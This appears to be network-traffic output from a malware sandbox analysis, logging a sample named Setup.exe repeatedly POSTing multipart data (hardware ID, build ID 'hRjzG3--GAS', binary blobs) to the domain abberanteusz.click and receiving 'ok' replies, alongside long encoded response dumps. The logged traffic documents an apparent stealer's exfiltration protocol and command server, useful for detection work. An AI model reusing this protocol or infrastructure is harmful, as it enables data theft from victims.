                                                                                                                                                                                                                                                            2025-01-01 18:04:09 UTC1369INData Raw: 46 57 76 79 6e 54 42 2f 2b 59 71 67 48 34 68 4f 49 43 4b 75 6e 77 2f 6c 6b 66 78 6f 5a 47 48 59 50 2f 78 34 6e 48 4a 64 38 73 35 47 62 72 4b 50 70 2b 77 35 69 66 49 4e 6e 4d 77 6c 63 6e 73 4d 68 71 51 58 50 71 72 30 37 39 6d 39 66 54 75 5a 49 52 73 6c 79 70 5a 74 63 4e 2f 7a 66 71 72 61 49 41 33 65 58 2f 41 69 74 4d 72 48 74 64 6d 38 61 58 64 74 58 57 78 34 4b 74 2b 79 57 2b 4a 59 41 48 39 79 33 62 43 39 65 51 6e 79 6a 35 6b 4e 5a 54 43 37 44 38 48 6d 6c 66 79 70 39 75 34 62 76 2f 37 37 57 36 43 59 34 4d 67 57 4c 65 47 4d 49 66 33 38 32 61 59 63 46 55 34 6c 4d 66 74 66 69 43 57 58 66 79 73 78 66 4a 38 76 2b 61 6c 59 49 55 6f 33 57 42 56 74 4d 5a 31 7a 66 54 72 49 63 30 31 59 6a 69 62 78 2b 55 32 47 35 4a 58 2f 71 4c 65 74 47 50 32 2b 2b 42 31 6a 47 47 4a
                                                                                                                                                                                                                                                            Data Ascii: FWvynTB/+YqgH4hOICKunw/lkfxoZGHYP/x4nHJd8s5GbrKPp+w5ifINnMwlcnsMhqQXPqr079m9fTuZIRslypZtcN/zfqraIA3eX/AitMrHtdm8aXdtXWx4Kt+yW+JYAH9y3bC9eQnyj5kNZTC7D8Hmlfyp9u4bv/77W6CY4MgWLeGMIf382aYcFU4lMftfiCWXfysxfJ8v+alYIUo3WBVtMZ1zfTrIc01Yjibx+U2G5JX/qLetGP2++B1jGGJ
                                                                                                                                                                                                                                                            2025-01-01 18:04:09 UTC187INData Raw: 68 6f 68 2b 2b 6c 50 34 41 33 62 58 2f 41 69 75 73 31 42 35 74 64 2b 36 62 56 75 6d 54 2f 38 75 35 68 67 6d 2b 43 4a 6c 53 31 79 33 76 45 38 65 38 73 30 6a 4e 71 4e 5a 58 41 6f 6e 4a 56 6b 6b 75 79 38 35 4f 56 62 39 6a 76 2f 6e 57 66 4b 4a 70 75 51 50 33 42 63 6f 65 6f 71 79 58 50 4f 57 34 33 6b 4d 58 74 4f 42 75 54 56 66 2b 75 33 4c 68 78 2b 66 48 6f 62 49 5a 6a 6c 79 42 55 75 63 70 36 7a 2f 76 68 5a 6f 35 77 5a 69 66 59 6b 71 49 4a 47 4a 70 54 38 62 32 54 72 53 33 6f 76 2b 4a 72 79 54 44 46 4c 46 65 39 79 58 4c 4c 2b 2b 4d 6e 7a 44 35 6d 4f 70 48 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: hoh++lP4A3bX/Aius1B5td+6bVumT/8u5hgm+CJlS1y3vE8e8s0jNqNZXAonJVkkuy85OVb9jv/nWfKJpuQP3BcoeoqyXPOW43kMXtOBuTVf+u3Lhx+fHobIZjlyBUucp6z/vhZo5wZifYkqIJGJpT8b2TrS3ov+JryTDFLFe9yXLL++MnzD5mOpH
                                                                                                                                                                                                                                                            2025-01-01 18:04:09 UTC1369INData Raw: 32 65 33 35 0d 0a 43 36 69 34 55 6b 56 76 7a 70 64 79 7a 5a 2f 54 36 34 57 43 4e 62 6f 70 67 46 2f 33 42 5a 6f 65 6f 71 77 6e 6e 42 53 4d 65 6f 6f 72 39 63 67 7a 56 56 50 37 72 69 2f 4a 76 38 76 50 74 61 49 39 68 69 53 70 51 74 73 70 31 77 2f 7a 69 49 38 59 78 5a 44 71 5a 7a 75 34 32 45 35 5a 51 2f 61 54 63 75 69 4f 2f 76 2b 4a 2f 79 54 44 46 42 55 36 32 79 48 69 48 37 36 55 2f 67 44 64 74 66 38 43 4b 37 6a 55 54 6b 31 62 2b 71 74 57 36 5a 76 6e 37 35 47 47 50 61 34 6f 6b 58 4c 7a 4a 65 73 76 2b 34 53 66 42 50 47 6f 77 6b 38 2b 69 63 6c 57 53 53 37 4c 7a 6b 34 4e 67 35 2b 6a 31 61 38 6c 33 79 7a 6b 5a 75 73 6f 2b 6e 37 44 71 4e 4d 6f 36 62 7a 71 58 7a 2b 45 7a 45 70 68 56 2f 71 48 61 75 6d 58 2b 39 76 64 6b 68 57 61 43 4c 6c 57 7a 79 33 54 45 2f 61 74 6f
                                                                                                                                                                                                                                                            Data Ascii: 2e35C6i4UkVvzpdyzZ/T64WCNbopgF/3BZoeoqwnnBSMeoor9cgzVVP7ri/Jv8vPtaI9hiSpQtsp1w/ziI8YxZDqZzu42E5ZQ/aTcuiO/v+J/yTDFBU62yHiH76U/gDdtf8CK7jUTk1b+qtW6Zvn75GGPa4okXLzJesv+4SfBPGowk8+iclWSS7Lzk4Ng5+j1a8l3yzkZuso+n7DqNMo6bzqXz+EzEphV/qHaumX+9vdkhWaCLlWzy3TE/ato
                                                                                                                                                                                                                                                            2025-01-01 18:04:09 UTC1369INData Raw: 69 66 77 65 6f 33 47 70 4e 42 2f 71 58 42 74 33 48 6a 76 36 73 6e 6a 6e 44 46 65 42 6d 4c 77 57 37 58 38 36 6b 58 31 6a 4e 33 4e 4a 58 47 6f 69 4e 62 6a 42 50 31 70 35 50 71 49 2f 66 77 37 47 53 47 61 59 77 73 56 4c 6a 50 65 38 62 32 37 79 7a 4b 4d 47 63 35 6d 63 2f 6f 50 78 53 66 57 76 57 6a 31 4c 46 78 73 62 47 6c 59 4a 45 6f 33 57 42 77 75 74 52 77 31 37 44 30 61 4e 6c 77 5a 6a 50 59 6b 71 49 34 48 35 70 58 39 61 66 56 74 32 58 38 2f 75 70 6d 69 57 65 42 4b 31 43 37 78 33 50 43 2f 65 38 30 79 6a 74 75 4d 35 48 47 37 33 78 62 31 56 54 71 36 34 76 79 55 76 7a 78 36 32 43 66 4b 4a 70 75 51 50 33 42 63 6f 65 6f 71 79 66 4d 50 32 49 77 6d 38 6e 6a 4e 67 65 48 58 2f 75 6a 31 72 35 6f 2f 2f 6e 33 59 59 5a 68 68 69 4e 51 75 73 35 79 7a 66 50 73 5a 6f 35 77 5a
                                                                                                                                                                                                                                                            Data Ascii: ifweo3GpNB/qXBt3Hjv6snjnDFeBmLwW7X86kX1jN3NJXGoiNbjBP1p5PqI/fw7GSGaYwsVLjPe8b27yzKMGc5mc/oPxSfWvWj1LFxsbGlYJEo3WBwutRw17D0aNlwZjPYkqI4H5pX9afVt2X8/upmiWeBK1C7x3PC/e80yjtuM5HG73xb1VTq64vyUvzx62CfKJpuQP3BcoeoqyfMP2Iwm8njNgeHX/uj1r5o//n3YYZhhiNQus5yzfPsZo5wZ
                                                                                                                                                                                                                                                            2025-01-01 18:04:09 UTC1369INData Raw: 6c 49 31 75 4d 45 2f 57 6e 6b 2b 6f 6a 39 2f 62 6a 59 49 39 6d 6c 79 56 66 73 73 6c 33 7a 76 54 6a 4a 63 41 30 5a 54 69 64 79 65 34 33 45 70 5a 63 39 71 4c 64 75 32 79 78 73 61 56 67 6b 53 6a 64 59 48 69 6d 78 58 4c 4b 73 50 52 6f 32 58 42 6d 4d 39 69 53 6f 6a 41 62 6b 46 50 34 72 64 65 33 5a 66 76 36 35 57 79 4b 5a 34 45 6d 58 62 4c 47 64 63 37 78 37 53 50 4b 4f 32 63 79 6d 38 7a 6b 66 46 76 56 56 4f 72 72 69 2f 4a 44 36 76 4c 70 59 4d 6c 33 79 7a 6b 5a 75 73 6f 2b 6e 37 44 67 4b 73 51 33 59 54 4b 62 77 75 63 34 48 35 42 54 2b 72 6e 62 73 6d 54 6a 37 65 56 75 6a 47 53 47 49 46 32 37 7a 33 6a 45 39 4b 74 6f 67 44 64 35 66 38 43 4b 7a 7a 41 53 76 46 54 70 36 38 7a 38 65 72 48 34 36 53 66 52 4b 49 51 72 55 37 4c 4c 66 63 48 7a 34 43 50 4b 4d 57 59 33 6c 64
                                                                                                                                                                                                                                                            Data Ascii: lI1uME/Wnk+oj9/bjYI9mlyVfssl3zvTjJcA0ZTidye43EpZc9qLdu2yxsaVgkSjdYHimxXLKsPRo2XBmM9iSojAbkFP4rde3Zfv65WyKZ4EmXbLGdc7x7SPKO2cym8zkfFvVVOrri/JD6vLpYMl3yzkZuso+n7DgKsQ3YTKbwuc4H5BT+rnbsmTj7eVujGSGIF27z3jE9KtogDd5f8CKzzASvFTp68z8erH46SfRKIQrU7LLfcHz4CPKMWY3ld
                                                                                                                                                                                                                                                            2025-01-01 18:04:09 UTC1369INData Raw: 31 52 54 78 75 63 47 30 59 4f 66 38 6f 6c 6d 33 54 35 38 74 58 36 72 58 51 50 6e 33 38 53 76 47 4a 33 42 7a 6a 63 6e 73 4d 68 4b 44 45 37 7a 72 33 50 49 37 79 4c 2b 74 4a 37 59 6d 78 54 67 5a 35 59 5a 4c 78 50 37 6c 49 64 59 68 4c 42 69 43 78 2b 51 72 42 4e 55 64 73 71 32 54 36 6a 4f 2f 76 2b 46 32 79 54 44 56 63 67 4c 6f 6c 53 6d 58 6f 76 52 6f 32 58 42 33 66 38 43 59 72 48 77 48 31 51 75 79 37 4e 43 67 63 66 66 38 38 32 54 4f 56 72 73 4f 58 72 76 44 65 64 65 79 78 53 33 55 4e 79 46 78 32 4d 57 69 5a 43 7a 56 47 37 4b 55 6e 66 4a 37 73 61 65 6c 55 6f 70 6d 69 79 64 50 72 49 74 51 77 50 62 75 49 64 42 79 54 7a 53 4d 7a 61 4a 79 56 5a 4d 54 71 76 75 64 38 6d 66 67 76 37 30 33 32 7a 50 51 63 77 37 74 6c 47 47 4a 36 61 73 77 67 47 67 7a 63 64 6a 59 6f 6d 52
                                                                                                                                                                                                                                                            Data Ascii: 1RTxucG0YOf8olm3T58tX6rXQPn38SvGJ3BzjcnsMhKDE7zr3PI7yL+tJ7YmxTgZ5YZLxP7lIdYhLBiCx+QrBNUdsq2T6jO/v+F2yTDVcgLolSmXovRo2XB3f8CYrHwH1Quy7NCgcff882TOVrsOXrvDedeyxS3UNyFx2MWiZCzVG7KUnfJ7saelUopmiydPrItQwPbuIdByTzSMzaJyVZMTqvud8mfgv7032zPQcw7tlGGJ6aswgGgzcdjYomR
                                                                                                                                                                                                                                                            2025-01-01 18:04:09 UTC1369INData Raw: 4c 71 54 2f 43 50 2b 76 37 31 65 79 53 44 46 48 78 66 39 33 6a 36 66 73 4e 34 6c 7a 6a 35 6d 4b 59 6d 48 78 54 49 53 6c 45 58 69 76 4e 7a 39 54 63 66 65 70 53 6e 4a 62 73 56 34 43 2f 4f 47 65 74 61 77 73 33 61 53 61 7a 52 73 7a 35 71 77 49 31 75 4d 45 2b 54 72 69 2b 41 74 73 65 32 6c 50 38 6b 76 68 6a 4a 4c 75 38 56 6f 78 4c 66 56 47 4f 63 2b 5a 6a 36 4f 32 75 38 77 4e 4a 5a 43 2b 4a 58 74 70 32 44 2f 38 65 4a 78 6d 43 6a 4c 59 46 62 39 6e 6b 65 48 75 4b 73 5a 6a 6e 42 35 66 38 43 4b 31 7a 38 62 6d 31 54 6b 75 70 36 56 62 66 62 2b 38 33 65 45 5a 4b 51 6a 53 4c 65 47 4d 49 66 32 71 33 36 53 66 69 45 37 69 59 71 36 62 45 66 4f 42 71 48 38 67 2b 42 38 76 2b 61 6c 63 63 6b 77 31 32 34 5a 72 34 59 6d 68 37 66 6f 4e 4e 49 32 59 69 6d 62 6a 64 77 43 4d 49 4a 51
                                                                                                                                                                                                                                                            Data Ascii: LqT/CP+v71eySDFHxf93j6fsN4lzj5mKYmHxTISlEXivNz9TcfepSnJbsV4C/OGetaws3aSazRsz5qwI1uME+Tri+Atse2lP8kvhjJLu8VoxLfVGOc+Zj6O2u8wNJZC+JXtp2D/8eJxmCjLYFb9nkeHuKsZjnB5f8CK1z8bm1Tkup6Vbfb+83eEZKQjSLeGMIf2q36SfiE7iYq6bEfOBqH8g+B8v+alcckw124Zr4Ymh7foNNI2YimbjdwCMIJQ


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2192.168.2.449732172.67.198.1024437316C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-01-01 18:04:11 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=6KMJCXQ2H9KXAAJ
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 18143
                                                                                                                                                                                                                                                            Host: abberanteusz.click
                                                                                                                                                                                                                                                            2025-01-01 18:04:11 UTC15331OUTData Raw: 2d 2d 36 4b 4d 4a 43 58 51 32 48 39 4b 58 41 41 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 35 30 44 42 46 34 45 36 34 32 45 46 32 32 43 38 45 34 33 37 35 44 34 38 41 35 31 39 31 36 0d 0a 2d 2d 36 4b 4d 4a 43 58 51 32 48 39 4b 58 41 41 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 4b 4d 4a 43 58 51 32 48 39 4b 58 41 41 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41 53 0d 0a 2d 2d 36 4b 4d 4a 43 58 51
                                                                                                                                                                                                                                                            Data Ascii: --6KMJCXQ2H9KXAAJContent-Disposition: form-data; name="hwid"6C50DBF4E642EF22C8E4375D48A51916--6KMJCXQ2H9KXAAJContent-Disposition: form-data; name="pid"2--6KMJCXQ2H9KXAAJContent-Disposition: form-data; name="lid"hRjzG3--GAS--6KMJCXQ
                                                                                                                                                                                                                                                            2025-01-01 18:04:11 UTC2812OUTData Raw: 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43
                                                                                                                                                                                                                                                            Data Ascii: d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wEC
                                                                                                                                                                                                                                                            2025-01-01 18:04:11 UTC1137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Wed, 01 Jan 2025 18:04:11 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=27j423nnheurs4029189c3veda; expires=Sun, 27 Apr 2025 11:50:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lKm5VDRDRzUrrHKA%2BRkgNwY%2Ba4aODluJvzwr%2FmT4uTsF2C6Ua84SqUqW%2Ff%2Blj46mgW6ZH8367XXORdokYtmmUJM4jUr8ft7wZUT9clpHbNRcpRKq8tcAaOiSoNeBVESGXVLm3us%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fb46e2acf494356-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=45654&min_rtt=1617&rtt_var=26733&sent=9&recv=21&lost=0&retrans=0&sent_bytes=2845&recv_bytes=19104&delivery_rate=1805813&cwnd=237&unsent_bytes=0&cid=292e71ddbaef9231&ts=566&x=0"
                                                                                                                                                                                                                                                            2025-01-01 18:04:11 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2025-01-01 18:04:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            3192.168.2.449733172.67.198.1024437316C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-01-01 18:04:12 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=LXYTJRBQ03JL
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 8746
                                                                                                                                                                                                                                                            Host: abberanteusz.click
                                                                                                                                                                                                                                                            2025-01-01 18:04:12 UTC8746OUTData Raw: 2d 2d 4c 58 59 54 4a 52 42 51 30 33 4a 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 35 30 44 42 46 34 45 36 34 32 45 46 32 32 43 38 45 34 33 37 35 44 34 38 41 35 31 39 31 36 0d 0a 2d 2d 4c 58 59 54 4a 52 42 51 30 33 4a 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 58 59 54 4a 52 42 51 30 33 4a 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41 53 0d 0a 2d 2d 4c 58 59 54 4a 52 42 51 30 33 4a 4c 0d 0a 43 6f
                                                                                                                                                                                                                                                            Data Ascii: --LXYTJRBQ03JLContent-Disposition: form-data; name="hwid"6C50DBF4E642EF22C8E4375D48A51916--LXYTJRBQ03JLContent-Disposition: form-data; name="pid"2--LXYTJRBQ03JLContent-Disposition: form-data; name="lid"hRjzG3--GAS--LXYTJRBQ03JLCo
                                                                                                                                                                                                                                                            2025-01-01 18:04:12 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Wed, 01 Jan 2025 18:04:12 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=1uvuij86i10bhe9j3deohb5ucf; expires=Sun, 27 Apr 2025 11:50:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BM30ksnd1FmI7EHcWbjfJ0MybA3dvi3TzNDBs6O2rUCFYSrUvFpjfCRzy%2FtHWB4ws7Lme60gPkJXmekyYqYfy0srUmwl7q0lwCgkctri8Ah%2Fnz8V%2BCG5XClXr%2FyaYjddLjBLTfE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fb46e32289172a5-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1952&min_rtt=1952&rtt_var=732&sent=6&recv=15&lost=0&retrans=0&sent_bytes=2846&recv_bytes=9681&delivery_rate=1495135&cwnd=203&unsent_bytes=0&cid=068dec0fc17c9364&ts=515&x=0"
                                                                                                                                                                                                                                                            2025-01-01 18:04:12 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2025-01-01 18:04:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            4192.168.2.449735172.67.198.1024437316C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-01-01 18:04:14 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=L57N9QSJ23X93STD
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 20423
                                                                                                                                                                                                                                                            Host: abberanteusz.click
                                                                                                                                                                                                                                                            2025-01-01 18:04:14 UTC15331OUTData Raw: 2d 2d 4c 35 37 4e 39 51 53 4a 32 33 58 39 33 53 54 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 35 30 44 42 46 34 45 36 34 32 45 46 32 32 43 38 45 34 33 37 35 44 34 38 41 35 31 39 31 36 0d 0a 2d 2d 4c 35 37 4e 39 51 53 4a 32 33 58 39 33 53 54 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4c 35 37 4e 39 51 53 4a 32 33 58 39 33 53 54 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41 53 0d 0a 2d 2d 4c 35 37 4e
                                                                                                                                                                                                                                                            Data Ascii: --L57N9QSJ23X93STDContent-Disposition: form-data; name="hwid"6C50DBF4E642EF22C8E4375D48A51916--L57N9QSJ23X93STDContent-Disposition: form-data; name="pid"3--L57N9QSJ23X93STDContent-Disposition: form-data; name="lid"hRjzG3--GAS--L57N
                                                                                                                                                                                                                                                            2025-01-01 18:04:14 UTC5092OUTData Raw: 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: M?lrQMn 64F6(X&7~`aO
                                                                                                                                                                                                                                                            2025-01-01 18:04:14 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Wed, 01 Jan 2025 18:04:14 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=ge46egb9u7gb0cp1p0u6pqt3sb; expires=Sun, 27 Apr 2025 11:50:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x%2BiMZG7QN2JZioxLHfs93NwiKjXW25vbzpd8202baB%2BMV5HUrkL1%2FaiCzVGeua%2BhojNjUKJgpAXDBdEqBxUZG9MmiuW2SuD4gYa7SWQwgdQezfdP7SIZ82NZLqrLPOwHhxTFXzE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fb46e3d99d043b2-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1617&min_rtt=1612&rtt_var=616&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21385&delivery_rate=1761158&cwnd=238&unsent_bytes=0&cid=27bc41abd7c6a712&ts=634&x=0"
                                                                                                                                                                                                                                                            2025-01-01 18:04:14 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2025-01-01 18:04:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            5192.168.2.449739172.67.198.1024437316C:\Users\user\Desktop\Setup.exe
